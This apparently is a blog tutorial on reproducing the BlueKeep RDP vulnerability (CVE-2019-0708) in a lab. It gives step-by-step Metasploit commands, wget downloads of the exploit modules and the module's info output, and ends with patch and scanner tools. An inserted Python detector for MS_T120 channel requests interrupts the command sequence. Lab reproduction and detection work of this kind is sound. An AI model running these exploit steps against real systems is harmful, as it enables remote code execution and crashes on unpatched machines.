CVE-2019-0708 Reproduction Tutorial

0x00 Preface

A few days ago, when the EXP for CVE-2019-0708 appeared, the security community got excited at once. Everyone followed the official documents and tutorials to set up an environment and reproduce the vulnerability. Being a newbie, I tried to reproduce it for a long time without success. Today I tried again and found where the problem was, so I am offering my own reproduction tutorial, even though tutorials are already all over the web.

0x01 Test Environment

Attacker machine: Kali Linux 2019.2

Target: Windows 7 Ultimate SP1

Windows Server 2008 R2 Standard

Attack framework: Metasploit

EXP:cve_2019_0708_bluekeep_rce

0x02 Related File Downloads

CVE-2019-0708 exp download address: link

Windows 7 Ultimate SP1 download address:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

Windows Server 2008 R2 Standard download address:

ed2k://|file|cn_windows_server_2008_r2_hpc_edition_with_service_pack_1_x64_dvd_700632.iso|3071051776|7FDEE0F7A49FC63148D4DE580D803742|/

0x03 Getting Started

3.1 Updating the Metasploit Framework

First, update to the latest Metasploit Framework; the version is 5.0.47.

The update command is as follows:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

Screenshot of the version after the update

After the update, the following two problems may appear:

This means the MSF service with database support has not been started and we need to start it. It has no effect on reproducing the vulnerability; it is just annoying to look at.

[Solution]

Type exit to leave msfconsole, then enter:

/etc/init.d/postgresql start

After entering it, wait until the following is shown:

When that text appears, enter: msfdb init

Run msfconsole again; the problem is solved.

3.2 Replacing the exp Files

First download the 0708 exp files. They were shared above, or you can download them directly with wget:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

Then go to the directory where the exp files were just downloaded and replace the original files with the following commands:

cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp ## create the rdp directory

cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

3.3 Starting the Reproduction

3.3.1 Windows 7 x64 SP1 Configuration

Step 1: Turn off the firewall


Step 2: Enable Remote Desktop on port 3389

3.3.2 Commands Used

msfconsole ## enter the Metasploit framework
reload_all ## reload the exploit modules
search 0708 ## search for the 0708 vulnerability
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce ## the 0708 RDP attack module
info ## view information about the vulnerability
show options ## view the parameters that need to be set
set rhosts <target IP> ## set the IP address of the target machine
show targets ## list the target types that can be attacked
set target <number> ## set the target type to attack
exploit ## start the exploit

msfconsole

reload_all

search 0708

info

Name: CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2019-05-14

Provided by:
Sean Dillon <sean.dillon@risksense.com>
Ryan Hanson <dunno@findthisout.com>
OJ Reeves <oj@beyondbinary.io>
Brent Cook <bcook@rapid7.com>

Available targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Check supported:
Yes

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS yes The target address range or CIDR identifier
RPORT 3389 yes The target port (TCP)

Payload information:
Space: 952

Description:
The RDP termdd.sys driver improperly handles binds to internal-only
channel MS_T120, allowing a malformed Disconnect Provider Indication
message to cause use-after-free. With a controllable data/size
remote nonpaged pool spray, an indirect call gadget of the freed
channel is used to achieve arbitrary code execution.

References:
https://cvedetails.com/cve/CVE-2019-0708/
https://github.com/zerosum0x0/CVE-2019-0708

Also known as:
Bluekeep
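Added here as a defender-side example that is not part of the original post or of Metasploit: a check for the condition the module description names, a client asking to bind the internal-only MS_T120 channel, written as an IDS-style parser over the client network data of the MCS Connect Initial PDU. The block layout follows MS-RDPBCGR (TS_UD_HEADER, TS_UD_CS_NET, CHANNEL_DEF); the sample blocks are constructed for the demo.

```python
"""Detect an RDP client asking to bind the internal-only MS_T120 channel.

Added example (not from the post or Metasploit): walks the GCC user-data
blocks of an MCS Connect Initial PDU like an IDS rule, finds TS_UD_CS_NET
(MS-RDPBCGR 2.2.1.3.4) and flags a CHANNEL_DEF named MS_T120, which no
legitimate client requests. Sample blocks at the bottom are constructed.
"""
import struct

CS_NET = 0xC003          # TS_UD_HEADER type of the client network data block
CHANNEL_DEF_LEN = 12     # 8-byte channel name + 4-byte options
SUSPICIOUS = b"MS_T120"

def iter_user_data_blocks(data: bytes):
    """Yield (type, body) for every TS_UD_HEADER-prefixed block in data."""
    off = 0
    while off + 4 <= len(data):
        btype, length = struct.unpack_from("<HH", data, off)
        if length < 4 or off + length > len(data):
            break            # truncated or malformed block: stop, never over-read
        yield btype, data[off + 4:off + length]
        off += length

def requested_channels(data: bytes):
    """Return the static virtual channel names the client asked for."""
    names = []
    for btype, body in iter_user_data_blocks(data):
        if btype != CS_NET or len(body) < 4:
            continue
        (count,) = struct.unpack_from("<I", body, 0)
        for i in range(count):
            chunk = body[4 + i * CHANNEL_DEF_LEN:4 + (i + 1) * CHANNEL_DEF_LEN]
            if len(chunk) < CHANNEL_DEF_LEN:
                break        # channelCount claims more entries than are present
            names.append(chunk[:8].split(b"\x00", 1)[0])
    return names

def is_bluekeep_probe(data: bytes) -> bool:
    """True when any requested channel is MS_T120 (case-insensitive)."""
    return any(n.upper() == SUSPICIOUS for n in requested_channels(data))

def build_cs_net(names):
    """Constructed helper: encode a TS_UD_CS_NET block as sample traffic."""
    defs = b"".join(n.ljust(8, b"\x00") + struct.pack("<I", 0) for n in names)
    body = struct.pack("<I", len(names)) + defs
    return struct.pack("<HH", CS_NET, 4 + len(body)) + body

# Constructed samples: a normal client (clipboard + drive redirection) and a probe.
BENIGN = build_cs_net([b"cliprdr", b"rdpdr"])
PROBE = build_cs_net([b"cliprdr", b"MS_T120", b"rdpdr"])
```

In practice this check runs on the first PDU of an RDP session, before authentication, which is exactly why it is useful as a network-side indicator for the module's "Check supported" condition.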

show options

set rhosts <target IP address>

show targets

set target 3

exploit

PS: both run and exploit work.

0x04 Reproduction Results

Windows Server 2008 R2 Standard blue-screens

Windows 7 Ultimate SP1 reproduction result

0x05 Vulnerability Detection and Repair Tool, Batch Scanning Tool and Hot Patch Tool

(Source: Qi An Xin WeChat public account)

[Download page]
https://www.qianxin.com/other/CVE-2019-0708
[Instructions]

1. Download the file and extract it.
2. Press Win+R or choose "Run" from the Start menu, type cmd, and open the command prompt.
3. In the command prompt, change to the folder containing the tool.
4. Enter the command for the desired function. Enable the hot patch: QKShield.exe /enable ; disable the hot patch: QKShield.exe /disable .
5. After a system reboot, the command must be run again to re-enable the hot patch.

[Effect]
After the hot patch is enabled on a supported system, the vulnerability scanner reports no vulnerability. Scanner download address: link
Supported systems:

Windows XP for 32-bit Systems Service Pack 3
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2003 for 32-bit Systems Service Pack 2
Windows Server 2003 R2 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Systems not yet supported:
Windows Server 2003 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1

0x05 Summary

I started trying to reproduce this as soon as the vulnerability came out, installing all kinds of environments and operating systems, but never succeeded. I read article after article and they all seemed to be the same basic steps with nothing different. I tried with Windows 7 x64 Ultimate SP1 and Windows Server 2008 R2 and neither worked, and after two days I gave up. Today a colleague of mine was also reproducing this vulnerability and pointed out my mistake: it turned out I had written set target 3 as set targets 3. I was really careless and did not pay attention to detail. Because the show targets command lists the attackable targets, I took it for granted that setting one would be set targets... and so the reproduction kept failing.


Finally, I must remember this lesson: details decide success or failure, and this time I failed on a detail. I hope I will not overlook such small details in the future. Let's encourage each other :D

0x06 References

  1. https://blog.csdn.net/weixin_44114370/article/details/89440153
  2. https://mp.weixin.qq.com/s?__biz=MzAxNjQ1NDQ0Mw==&mid=2247483662&idx=1&sn=9927dd8b4df7e710ddc4d8b02f922d8d&chksm=9bf5c74aac824e5cfbde1c6587b6fdb149d464bc822a5b764f25538183e6e64934d549461d5d&mpshare=1&scene=1&srcid=&sharer_sharetime=1567824187733&sharer_shareid=6236dccf93a9257bd8ba451703af334b&key=ee95eb58550bee7fb822e11f9b1822af1833bae210322a6de084b4219a556826d764fbbf32aa5607dc4acf61a722ef8421901382f992c938d121d6226db2bc2b35a9d19b0eec3693f4a44e6b5d0298de&ascene=1&uin=NjA3MTQ5MDY2&devicetype=Windows+10&version=62060841&lang=zh_CN&pass_ticket=5vOsZrZPCHS2PeMt2y%2FquS927zFQZnSX%2FB%2FcGniqOlND7FA0KtfW5jlUG4BlXuNP
  3. https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961
  4. https://github.com/mai-lang-chai/CVE-2019-0708-RCE
  5. https://www.qianxin.com/other/CVE-2019-0708

Author: madcoding
Article link: https://www.mad-coding.cn/2019/09/11/CVE-2019-0708复现教程/
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. When reposting, please credit madcoding's blog.